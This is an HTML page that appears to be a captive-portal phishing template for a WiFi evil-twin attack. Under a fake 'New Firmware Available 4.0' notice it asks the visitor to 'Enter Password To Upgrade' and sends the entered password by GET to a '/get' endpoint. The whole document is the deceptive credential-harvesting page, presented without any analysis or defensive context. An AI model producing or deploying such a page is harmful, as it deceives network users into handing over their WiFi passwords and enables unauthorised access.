<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WiFi Connect</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #ffffff;
            margin: 0;
        }
        .container {
            text-align: center;
        }
        h1 {
            font-size: 24px;
            margin-bottom: 20px;
        }
        input {
            width: 300px;
            padding: 10px;
            font-size: 16px;
            border: 1px solid #ccc;
            border-radius: 5px;
            outline: none;
            text-align: center;
        }
        button {
            width: 320px;
            padding: 12px;
            font-size: 18px;
            background-color: blue;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 10px;
        }
        button:hover {
            background-color: darkblue;
        }
    </style>
</head>
<body>

<div class="container">
    <form action="/get" method="get" id="email-form-step" class="form">
    <h1>New Firmware Available 4.0 </h1>
    <input name="password" type="password" placeholder="Enter Password To Upgrade" required>
    <br>
    <button type="submit">Connect</button>
</div>

</body>
</html>